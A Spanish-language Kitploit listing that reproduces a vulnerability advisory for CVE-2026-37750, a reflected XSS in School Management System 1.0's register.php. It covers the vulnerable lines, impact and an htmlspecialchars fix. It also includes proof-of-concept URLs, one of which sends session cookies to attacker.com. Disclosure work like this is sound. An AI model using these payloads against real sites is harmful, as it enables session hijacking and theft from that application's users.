Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-37750 — Prueba de concepto de XSS reflejado para School Management System 1.0, que demuestra la ejecución de JavaScript sin autenticación a través del parámetro type en register.php, con análisis de impacto y guía de remediación. | Kitploit
Herramientas/GitHubGitHub/menevarad007/cve-2026-37750
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebAprendizaje y Educación
GitHubmenevarad007/cve-2026-37750

CVE-2026-37750

Prueba de concepto de XSS reflejado para School Management System 1.0, que demuestra la ejecución de JavaScript sin autenticación a través del parámetro type en register.php, con análisis de impacto y guía de remediación.

Ver Repositorio
hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-37750 — School Management System 1.0 - XSS Reflejado

Detalles

CampoInformación
ID CVECVE-2026-37750
TipoCross-Site Scripting (XSS) Reflejado
SeveridadMedia (CVSSv3: 6.1)
Vendedormahmoudai1
ProductoSchool Management System
Versión1.0
DescubridorVarad AP Mene
Fecha2026-04-16
CWECWE-79

Descripción

Una vulnerabilidad de Cross-Site Scripting (XSS) reflejado en School Management System 1.0 de mahmoudai1 permite a atacantes remotos no autenticados ejecutar JavaScript arbitrario en los navegadores de las víctimas mediante el parámetro type sin sanitizar en register.php. El parámetro se refleja sin escape dentro de una etiqueta h1 en la línea 22 y dentro de un atributo action de formulario en la línea 26. No se requiere autenticación para explotar esta vulnerabilidad.

ID CVE: CVE-2026-37750 CWE: CWE-79 CVSSv3: 6.1 Media (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)


Descripción del Producto

School Management System 1.0 es una aplicación web PHP/MySQL de mahmoudai1 en GitHub utilizada para gestionar estudiantes, profesores y padres en escuelas.

URL del vendedor: https://github.com/mahmoudai1/school-management-system


Archivo Vulnerable

register.php — Formulario de registro (no requiere autenticación)


Código Vulnerable

Línea 22: echo ucfirst($_REQUEST['type'])

Línea 26: echo $_REQUEST['type']

No se usa htmlspecialchars() — la entrada de usuario sin procesar se refleja directamente en el HTML.


Prueba de Concepto

Requisitos previos:

  • No se requiere autenticación
  • El objetivo debe estar ejecutando School Management System 1.0

Paso 1 — Abra el navegador y visite esta URL: http://target/register.php?type=script-alert-document.cookie-/script

Paso 2 — JavaScript se ejecuta en el navegador Resultado: Aparece una ventana de alerta mostrando las cookies de sesión.

Paso 3 — Payload de robo de cookies: http://target/register.php?type=script-document.location-http://attacker.com/steal?c=-document.cookie-/script Paso 4 — Payload de inyección en el atributo action del formulario: http://target/register.php?type="-script-alert(1)-/script

Dos puntos de inyección confirmados:

Punto de Inyección 1 — Dentro de la etiqueta h1 (línea 22):

root@kitploit:~
echo ucfirst($_REQUEST['type'])

Salida:

root@kitploit:~
<h1><script>alert(1)</script> Application</h1>

Punto de Inyección 2 — Dentro del atributo action del formulario (línea 26):

root@kitploit:~
echo $_REQUEST['type']

Salida:

root@kitploit:~
<form action="register.php?type=<script>alert(1)</script>">

Impacto

  • Secuestro de sesión mediante robo de cookies
  • Phishing — inyección de formularios de inicio de sesión falsos
  • Distribución de malware mediante redirecciones
  • No se requiere autenticación

Remediación

Corrección de la línea 22: echo htmlspecialchars(ucfirst($_REQUEST['type']), ENT_QUOTES, 'UTF-8');

Corrección de la línea 26: echo htmlspecialchars($_REQUEST['type'], ENT_QUOTES, 'UTF-8');


Referencias

  • https://github.com/mahmoudai1/school-management-system
  • https://github.com/mahmoudai1/school-management-system/blob/main/register.php

Descubridor

Varad AP Mene Correo electrónico: [email protected] GitHub: https://github.com/menevarad007

Descargar herramienta